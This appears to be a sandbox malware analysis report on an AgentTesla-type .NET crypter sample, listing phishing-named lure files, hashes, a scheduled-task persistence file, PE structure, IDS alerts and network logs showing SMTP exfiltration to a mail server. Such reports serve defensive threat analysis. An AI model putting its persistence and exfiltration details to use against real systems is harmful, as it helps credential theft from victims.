solicitud de presupuesto 29-11-2022.exe | malicious | 3.232.242.170, 52.20.78.240
library.dll | malicious | 3.232.242.170, 52.20.78.240
MACHINE SPECIFICATIONS.exe | malicious | 3.232.242.170, 52.20.78.240
SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exe | malicious | 3.232.242.170, 52.20.78.240
MEPS-42.exe | malicious | 3.232.242.170, 52.20.78.240
11-29-22.exe | malicious | 3.232.242.170, 52.20.78.240
ORDER.exe | malicious | 3.232.242.170, 52.20.78.240
SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exe | malicious | 3.232.242.170, 52.20.78.240
Quotation.exe | malicious | 3.232.242.170, 52.20.78.240
Ziraat-bankasiSwiftMessaji2911202245344.exe | malicious | 3.232.242.170, 52.20.78.240
Cg7vRuVKhI.exe | malicious | 3.232.242.170, 52.20.78.240
SecuriteInfo.com.Win32.PWSX-gen.7918.18477.exe | malicious | 3.232.242.170, 52.20.78.240
SecuriteInfo.com.Win32.CrypterX-gen.12789.377.exe | malicious | 3.232.242.170, 52.20.78.240
Wzf4gWTOC2.exe | malicious | 3.232.242.170, 52.20.78.240
AWB DHL 7214306201 Shipment.pdf (432).exe | malicious | 3.232.242.170, 52.20.78.240
WxuqCcSnq2.exe | malicious | 3.232.242.170, 52.20.78.240

No context
Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5: 69206D3AF7D6EFD08F4B4726998856D3
SHA1: E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256: A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512: CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Process: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5: 69206D3AF7D6EFD08F4B4726998856D3
SHA1: E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256: A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512: CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1657
Entropy (8bit): 5.1584897189168
Encrypted: false
SSDEEP: 24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3PItn:cbha7JlNQV/rydbz9I3YODOLNdq3Ju
MD5: 03051B1F18A035DE03D059366AC0473E
SHA1: 155345324D235531556DDFE9F16B9C056D4C9505
SHA-256: 92BF6136677687B06E7E22A50F24B0DD8B0B5FA6C3A89DA9516AAC6259ACA56D
SHA-512: 1EB4CCBBD475035EAEF04AFCEB318583B8BB26F350AF5B68D7F19D080AEEADA96B67E00DC89DE4CA4608561B3F6AB64D135A505B322D24BBDE60437B8FA491CC
Malicious: true
Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail

Process: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1657
Entropy (8bit): 5.1584897189168
Encrypted: false
SSDEEP: 24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3PItn:cbha7JlNQV/rydbz9I3YODOLNdq3Ju
MD5: 03051B1F18A035DE03D059366AC0473E
SHA1: 155345324D235531556DDFE9F16B9C056D4C9505
SHA-256: 92BF6136677687B06E7E22A50F24B0DD8B0B5FA6C3A89DA9516AAC6259ACA56D
SHA-512: 1EB4CCBBD475035EAEF04AFCEB318583B8BB26F350AF5B68D7F19D080AEEADA96B67E00DC89DE4CA4608561B3F6AB64D135A505B322D24BBDE60437B8FA491CC
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail

Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 847360
Entropy (8bit): 7.451826150772928
Encrypted: false
SSDEEP: 12288:/mMlc1PL/pFr5cE8LHWU/SEdRMA/LyVu6gtXSRxS36qGn3eV6H5ADAUaoZqxIB/N:eqvLj9/L1tsAK/n3eVk55Ul4x+/yIn
MD5: FE1AA7FA995970EBB34465D5DC0D8CE1
SHA1: 7505B261CC9DF8C6AB8F10E035CF8D8319043CDB
SHA-256: 655B12A219D0F0E39A84FE44483E25411BE852CE2BB0D451A1CB1A9A670F70B8
SHA-512: 245277E1F0F637BDA7E2B5D1F76AE06656AEB0A7DF47EB428EDF8C6472F9AF03580234B9CD4A95321A96E6511D9E75279C452C5B58AE182B060A6CA35949A77C
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 32%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....c..............P.................. ... ....@.. .......................`............@.....................................K.... .......................@......[................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H............................:..........................................Z(....8.....(....8....*.&~.......*...~....*.b(....8......(....8.....*...&~.......*...~....*..0..~.......8O.......E....$...8....s.........8....s.........8)...*s.........8....s.........8....(....8....s......... .....:....& ....8.......0...........~....o......8......*8....8......0..$.......8....8....8......*.~....o......8.....0...........~....o......8....8....8......*..0...........~....o......8....8....8....
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.451826150772928
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
File size: 847360
MD5: fe1aa7fa995970ebb34465d5dc0d8ce1
SHA1: 7505b261cc9df8c6ab8f10e035cf8d8319043cdb
SHA256: 655b12a219d0f0e39a84fe44483e25411be852ce2bb0d451a1cb1a9a670f70b8
SHA512: 245277e1f0f637bda7e2b5d1f76ae06656aeb0a7df47eb428edf8c6472f9af03580234b9cd4a95321a96e6511d9e75279c452c5b58ae182b060a6ca35949a77c
SSDEEP: 12288:/mMlc1PL/pFr5cE8LHWU/SEdRMA/LyVu6gtXSRxS36qGn3eV6H5ADAUaoZqxIB/N:eqvLj9/L1tsAK/n3eVk55Ul4x+/yIn
TLSH: B0057C9573728973F1CF01359095718C6EBCE543A2A6E2076FB63A8146027BFFA9CE41
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..............P.................. ... ....@.. .......................`............@................................
Icon Hash: 00828e8e8686b000
Entrypoint: 0x4d02ee
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x6385E21F [Tue Nov 29 10:42:39 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al        (repeated 97 times: 00 00 padding, not code)

The entry point is the standard 6-byte CLR stub of a 32-bit managed executable: 0x00402000 is image base 0x400000 plus the single IAT slot (IMAGE_DIRECTORY_ENTRY_IAT at RVA 0x2000, size 8), which holds the only native import, mscoree.dll!_CorExeMain. The stub ends exactly where .text ends (0x2000 + 0xce2f4 = 0xd02f4 = entry RVA 0xd02ee + 6), so the run of add byte ptr [eax], al that follows is the disassembler decoding zero bytes beyond the section's virtual size. All real behaviour lives in the managed code and the data it unpacks, not in this native prologue.
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xd02a0          0x4b          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xd2000          0x5c8         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xd4000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xd025b          0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity    File Type  Entropy              Characteristics
.text   0x2000           0xce2f4       0xce400   False     0.764352509469697  data       7.457613017086461    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xd2000          0x5c8         0x600     False     0.427734375        data       4.1465073095381015   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xd4000          0xc           0x200     False     0.044921875        data       0.08153941234324169  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

An entropy of 7.46 (maximum 8.0) over the 0xce400 bytes of .text means the section is close to random data: plain IL and metadata do not score that high, so most of the section is compressed or encrypted payload carried by a small managed loader. This is the static signal behind the crypter classification, and it means string- or opcode-based Yara on the file on disk will mostly miss; the unpacked payload should be hunted in memory.
Name         RVA      Size   Type                                                                               Language  Country
RT_VERSION   0xd20a0  0x33c  data
RT_MANIFEST  0xd23dc  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
DLL          Import
mscoree.dll  _CorExeMain
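
The Import Hash reported above is worth checking before anyone pivots on it. The Python below is an added example, not part of the Joe Sandbox report: it reimplements the imphash recipe used by pefile and VirusTotal (lower-case DLL name without its extension, a dot, the lower-case function name; entries joined by commas; MD5 of that string) and recomputes the hash from the single import listed. Every 32-bit .NET executable whose only native import is mscoree.dll!_CorExeMain produces this same value, so the hash says "managed executable", not "this sample". The import list and the reported hash are taken from the tables above; the ordinal handling is a simplification of pefile's (it does not consult pefile's per-DLL ordinal name tables) and is an assumption of this example.

```python
"""Recompute a PE import hash (imphash) from an import list.

Added example for this report page; not Joe Sandbox or pefile code.
Implements the same recipe pefile.PE.get_imphash() uses, minus pefile's
ordinal-to-name lookup tables for ws2_32/oleaut32 (assumption: ordinals are
rendered as ordNNN, which is also what pefile does when no table matches).
"""
import hashlib

# Extensions pefile strips from the DLL name before hashing.
_STRIPPED_EXTENSIONS = (".dll", ".ocx", ".sys")

# The only import the report lists for this sample, in import-table order.
SAMPLE_IMPORTS = [("mscoree.dll", "_CorExeMain")]

# Value printed under "Import Hash" in the report.
REPORTED_IMPHASH = "f34d5f2d4577ed6d9ceec516c1f5a744"


def imphash(imports):
    """imports: iterable of (dll_name, function_name_or_ordinal_int)."""
    parts = []
    for dll, func in imports:
        lib = dll.lower()
        for ext in _STRIPPED_EXTENSIONS:
            if lib.endswith(ext):
                lib = lib[: -len(ext)]
                break
        name = f"ord{func}" if isinstance(func, int) else func.lower()
        parts.append(f"{lib}.{name}")
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest()


def is_generic_dotnet_imphash(value):
    """True when `value` is the hash every 32-bit CLR EXE stub yields.

    Such a hash carries no information about the family and must not be
    used as an indicator; cluster on SHA256, SSDEEP/TLSH or Yara instead.
    """
    return value.lower() == imphash([("mscoree.dll", "_CorExeMain")])


if __name__ == "__main__":
    computed = imphash(SAMPLE_IMPORTS)
    status = "matches report" if computed == REPORTED_IMPHASH else "MISMATCH"
    print(f"imphash = {computed} ({status})")
    print("generic .NET stub hash:", is_generic_dotnet_imphash(computed))
```

An imphash search for this value returns managed executables of every kind, benign and malicious; the SHA256, the SSDEEP and TLSH values, and the Yara matches in this report are the fields that actually identify the sample.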
Timestamp                 Protocol  SID      Message                              Source Port  Dest Port  Source IP    Dest IP
11/29/22-16:51:24.449797  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49717        587        192.168.2.6  111.118.212.38
11/29/22-16:52:18.188399  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49722        587        192.168.2.6  111.118.212.38
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Nov 29, 2022 16:50:57.881586075 CET  49713        443        192.168.2.6     52.20.78.240
Nov 29, 2022 16:50:57.881650925 CET  443          49713      52.20.78.240    192.168.2.6
Nov 29, 2022 16:50:57.881889105 CET  49713        443        192.168.2.6     52.20.78.240
Nov 29, 2022 16:50:58.005610943 CET  49713        443        192.168.2.6     52.20.78.240
Nov 29, 2022 16:50:58.005644083 CET  443          49713      52.20.78.240    192.168.2.6
Nov 29, 2022 16:50:58.314330101 CET  443          49713      52.20.78.240    192.168.2.6
Nov 29, 2022 16:50:58.314445019 CET  49713        443        192.168.2.6     52.20.78.240
Nov 29, 2022 16:50:58.332873106 CET  49713        443        192.168.2.6     52.20.78.240
Nov 29, 2022 16:50:58.332928896 CET  443          49713      52.20.78.240    192.168.2.6
Nov 29, 2022 16:50:58.333657026 CET  443          49713      52.20.78.240    192.168.2.6
Nov 29, 2022 16:50:58.413805962 CET  49713        443        192.168.2.6     52.20.78.240
Nov 29, 2022 16:50:59.610924959 CET  49713        443        192.168.2.6     52.20.78.240
Nov 29, 2022 16:50:59.610958099 CET  443          49713      52.20.78.240    192.168.2.6
Nov 29, 2022 16:50:59.757527113 CET  443          49713      52.20.78.240    192.168.2.6
Nov 29, 2022 16:50:59.757646084 CET  443          49713      52.20.78.240    192.168.2.6
Nov 29, 2022 16:50:59.757844925 CET  49713        443        192.168.2.6     52.20.78.240
Nov 29, 2022 16:50:59.763855934 CET  49713        443        192.168.2.6     52.20.78.240
Nov 29, 2022 16:51:19.879105091 CET  49717        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:51:20.153131008 CET  587          49717      111.118.212.38  192.168.2.6
Nov 29, 2022 16:51:20.155756950 CET  49717        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:51:21.977685928 CET  587          49717      111.118.212.38  192.168.2.6
Nov 29, 2022 16:51:21.978070021 CET  49717        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:51:22.252252102 CET  587          49717      111.118.212.38  192.168.2.6
Nov 29, 2022 16:51:22.253521919 CET  49717        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:51:22.526686907 CET  587          49717      111.118.212.38  192.168.2.6
Nov 29, 2022 16:51:22.527221918 CET  49717        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:51:22.840261936 CET  587          49717      111.118.212.38  192.168.2.6
Nov 29, 2022 16:51:23.584398985 CET  587          49717      111.118.212.38  192.168.2.6
Nov 29, 2022 16:51:23.585345030 CET  49717        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:51:23.860565901 CET  587          49717      111.118.212.38  192.168.2.6
Nov 29, 2022 16:51:23.860614061 CET  587          49717      111.118.212.38  192.168.2.6
Nov 29, 2022 16:51:23.860863924 CET  49717        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:51:24.168071032 CET  587          49717      111.118.212.38  192.168.2.6
Nov 29, 2022 16:51:24.169872999 CET  49717        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:51:24.442694902 CET  587          49717      111.118.212.38  192.168.2.6
Nov 29, 2022 16:51:24.443375111 CET  587          49717      111.118.212.38  192.168.2.6
Nov 29, 2022 16:51:24.449796915 CET  49717        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:51:24.449903011 CET  49717        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:51:24.449991941 CET  49717        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:51:24.450061083 CET  49717        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:51:24.722711086 CET  587          49717      111.118.212.38  192.168.2.6
Nov 29, 2022 16:51:24.724167109 CET  587          49717      111.118.212.38  192.168.2.6
Nov 29, 2022 16:51:24.771972895 CET  49717        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:51:46.825879097 CET  49720        443        192.168.2.6     3.232.242.170
Nov 29, 2022 16:51:46.825941086 CET  443          49720      3.232.242.170   192.168.2.6
Nov 29, 2022 16:51:46.826066017 CET  49720        443        192.168.2.6     3.232.242.170
Nov 29, 2022 16:51:46.846575975 CET  49720        443        192.168.2.6     3.232.242.170
Nov 29, 2022 16:51:46.846611977 CET  443          49720      3.232.242.170   192.168.2.6
Nov 29, 2022 16:51:47.147500992 CET  443          49720      3.232.242.170   192.168.2.6
Nov 29, 2022 16:51:47.147674084 CET  49720        443        192.168.2.6     3.232.242.170
Nov 29, 2022 16:51:47.156049967 CET  49720        443        192.168.2.6     3.232.242.170
Nov 29, 2022 16:51:47.156074047 CET  443          49720      3.232.242.170   192.168.2.6
Nov 29, 2022 16:51:47.156639099 CET  443          49720      3.232.242.170   192.168.2.6
Nov 29, 2022 16:51:47.261645079 CET  49720        443        192.168.2.6     3.232.242.170
Nov 29, 2022 16:51:48.546381950 CET  49720        443        192.168.2.6     3.232.242.170
Nov 29, 2022 16:51:48.546422958 CET  443          49720      3.232.242.170   192.168.2.6
Nov 29, 2022 16:51:48.813997984 CET  443          49720      3.232.242.170   192.168.2.6
Nov 29, 2022 16:51:48.814122915 CET  443          49720      3.232.242.170   192.168.2.6
Nov 29, 2022 16:51:48.814193010 CET  49720        443        192.168.2.6     3.232.242.170
Nov 29, 2022 16:51:48.816801071 CET  49720        443        192.168.2.6     3.232.242.170
Nov 29, 2022 16:52:11.437999010 CET  49722        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:52:11.715953112 CET  587          49722      111.118.212.38  192.168.2.6
Nov 29, 2022 16:52:11.716146946 CET  49722        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:52:14.190653086 CET  587          49722      111.118.212.38  192.168.2.6
Nov 29, 2022 16:52:14.194787025 CET  49722        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:52:14.473042011 CET  587          49722      111.118.212.38  192.168.2.6
Nov 29, 2022 16:52:14.499712944 CET  49722        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:52:14.778090954 CET  587          49722      111.118.212.38  192.168.2.6
Nov 29, 2022 16:52:14.842102051 CET  49722        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:52:16.164179087 CET  49722        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:52:16.482769012 CET  587          49722      111.118.212.38  192.168.2.6
Nov 29, 2022 16:52:17.294580936 CET  587          49722      111.118.212.38  192.168.2.6
Nov 29, 2022 16:52:17.297631979 CET  49722        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:52:17.575767994 CET  587          49722      111.118.212.38  192.168.2.6
Nov 29, 2022 16:52:17.575813055 CET  587          49722      111.118.212.38  192.168.2.6
Nov 29, 2022 16:52:17.576160908 CET  49722        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:52:17.894834995 CET  587          49722      111.118.212.38  192.168.2.6
Nov 29, 2022 16:52:17.900510073 CET  587          49722      111.118.212.38  192.168.2.6
Nov 29, 2022 16:52:17.901293039 CET  49722        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:52:18.179555893 CET  587          49722      111.118.212.38  192.168.2.6
Nov 29, 2022 16:52:18.179738045 CET  587          49722      111.118.212.38  192.168.2.6
Nov 29, 2022 16:52:18.188399076 CET  49722        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:52:18.188513041 CET  49722        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:52:18.188616991 CET  49722        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:52:18.188690901 CET  49722        587        192.168.2.6     111.118.212.38
Nov 29, 2022 16:52:18.466383934 CET  587          49722      111.118.212.38  192.168.2.6
Nov 29, 2022 16:52:18.467991114 CET  587          49722      111.118.212.38  192.168.2.6
Nov 29, 2022 16:52:18.514267921 CET  49722        587        192.168.2.6     111.118.212.38
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Nov 29, 2022 16:50:57.772516966 CET  59082        53         192.168.2.6  8.8.8.8
Nov 29, 2022 16:50:57.789524078 CET  53           59082      8.8.8.8      192.168.2.6
Nov 29, 2022 16:50:57.822091103 CET  59504        53         192.168.2.6  8.8.8.8
Nov 29, 2022 16:50:57.841023922 CET  53           59504      8.8.8.8      192.168.2.6
Nov 29, 2022 16:51:19.333461046 CET  63229        53         192.168.2.6  8.8.8.8
Nov 29, 2022 16:51:19.724127054 CET  53           63229      8.8.8.8      192.168.2.6
Nov 29, 2022 16:51:19.859044075 CET  62538        53         192.168.2.6  8.8.8.8
Nov 29, 2022 16:51:19.876422882 CET  53           62538      8.8.8.8      192.168.2.6
Nov 29, 2022 16:51:46.733128071 CET  56122        53         192.168.2.6  8.8.8.8
Nov 29, 2022 16:51:46.752038956 CET  53           56122      8.8.8.8      192.168.2.6
Nov 29, 2022 16:51:46.779407978 CET  52556        53         192.168.2.6  8.8.8.8
Nov 29, 2022 16:51:46.796346903 CET  53           52556      8.8.8.8      192.168.2.6
Nov 29, 2022 16:52:10.584884882 CET  52481        53         192.168.2.6  8.8.8.8
Nov 29, 2022 16:52:10.964626074 CET  53           52481      8.8.8.8      192.168.2.6
Nov 29, 2022 16:52:11.035455942 CET  53943        53         192.168.2.6  8.8.8.8
Nov 29, 2022 16:52:11.434695959 CET  53           53943      8.8.8.8      192.168.2.6
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                             Type            Class        DNS over HTTPS
Nov 29, 2022 16:50:57.772516966 CET  192.168.2.6  8.8.8.8  0x2ea1    Standard query (0)  api.ipify.org                    A (IP address)  IN (0x0001)  false
Nov 29, 2022 16:50:57.822091103 CET  192.168.2.6  8.8.8.8  0xa8aa    Standard query (0)  api.ipify.org                    A (IP address)  IN (0x0001)  false
Nov 29, 2022 16:51:19.333461046 CET  192.168.2.6  8.8.8.8  0xe3da    Standard query (0)  mail.strictfacilityservices.com  A (IP address)  IN (0x0001)  false
Nov 29, 2022 16:51:19.859044075 CET  192.168.2.6  8.8.8.8  0xf4ba    Standard query (0)  mail.strictfacilityservices.com  A (IP address)  IN (0x0001)  false
Nov 29, 2022 16:51:46.733128071 CET  192.168.2.6  8.8.8.8  0x1df9    Standard query (0)  api.ipify.org                    A (IP address)  IN (0x0001)  false
Nov 29, 2022 16:51:46.779407978 CET  192.168.2.6  8.8.8.8  0x6660    Standard query (0)  api.ipify.org                    A (IP address)  IN (0x0001)  false
Nov 29, 2022 16:52:10.584884882 CET  192.168.2.6  8.8.8.8  0x1930    Standard query (0)  mail.strictfacilityservices.com  A (IP address)  IN (0x0001)  false
Nov 29, 2022 16:52:11.035455942 CET  192.168.2.6  8.8.8.8  0xd825    Standard query (0)  mail.strictfacilityservices.com  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                             CName                        Address         Type                    Class        DNS over HTTPS
Nov 29, 2022 16:50:57.789524078 CET  8.8.8.8    192.168.2.6  0x2ea1    No error (0)  api.ipify.org                    api.ipify.org.herokudns.com  -               CNAME (Canonical name)  IN (0x0001)  false
Nov 29, 2022 16:50:57.789524078 CET  8.8.8.8    192.168.2.6  0x2ea1    No error (0)  api.ipify.org.herokudns.com      -                            52.20.78.240    A (IP address)          IN (0x0001)  false
Nov 29, 2022 16:50:57.789524078 CET  8.8.8.8    192.168.2.6  0x2ea1    No error (0)  api.ipify.org.herokudns.com      -                            3.220.57.224    A (IP address)          IN (0x0001)  false
Nov 29, 2022 16:50:57.789524078 CET  8.8.8.8    192.168.2.6  0x2ea1    No error (0)  api.ipify.org.herokudns.com      -                            3.232.242.170   A (IP address)          IN (0x0001)  false
